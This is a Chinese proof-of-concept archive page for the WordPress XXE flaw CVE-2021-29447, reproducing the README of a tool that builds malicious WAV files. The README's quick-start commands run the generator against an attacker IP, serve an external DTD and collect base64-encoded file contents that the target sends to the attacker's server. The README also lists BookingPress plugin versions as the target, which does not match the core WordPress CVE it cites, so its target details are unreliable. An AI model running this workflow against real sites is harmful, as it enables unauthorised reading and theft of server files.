关联漏洞
标题:
WordPress 代码问题漏洞
(CVE-2021-29447)
描述:WordPress是WordPress(Wordpress)基金会的一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。 WordPress 存在代码问题漏洞,攻击者可利用该漏洞在成功的XXE攻击中可以访问内部文件。
描述
A XXE payload generator
介绍
# WAV iXML XXE Exploit Generator
Generates malicious WAV files that exploit XXE vulnerabilities in WordPress plugins parsing iXML metadata chunks (e.g., BookingPress < 1.0.11).
## Quick Start
```bash
# Generate exploit files
python3 expl.py -i 10.10.14.204 -p 9200
# Start HTTP server
python3 -m http.server 9200
# Upload exploit.wav to target
# Monitor logs for data exfiltration
# Decode exfiltrated data
echo "BASE64_STRING" | base64 -d
```
## Workflow
```
┌──────────┐ 1. Upload ┌──────────┐
│ Attacker │ ───exploit.wav──>│ Target │
└──────────┘ └──────────┘
▲ │
│ │ 2. Parse XML
│ │
│ 3. GET /xxe.dtd │
│<─────────────────────────────┘
│
│ 4. GET /?p=base64_data
│<─────────────────────────────┐
│ │
└─ Decode and read file │
```
## Vulnerable Targets
- WordPress BookingPress Plugin < 1.0.11
- Any application parsing iXML chunks in WAV files without disabling external entities
## References
- [WPScan Vulnerability DB](https://wpscan.com/vulnerability/cbbe6c17-b24e-4be4-8937-c78472a138b5/)
- CVE: CVE-2021-29447
文件快照
[4.0K] /data/pocs/ddc902ca7f0bdbd7c3f2f1b7f4b5ff617c175b08
├── [ 28K] expl.py
└── [1.5K] README.md
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。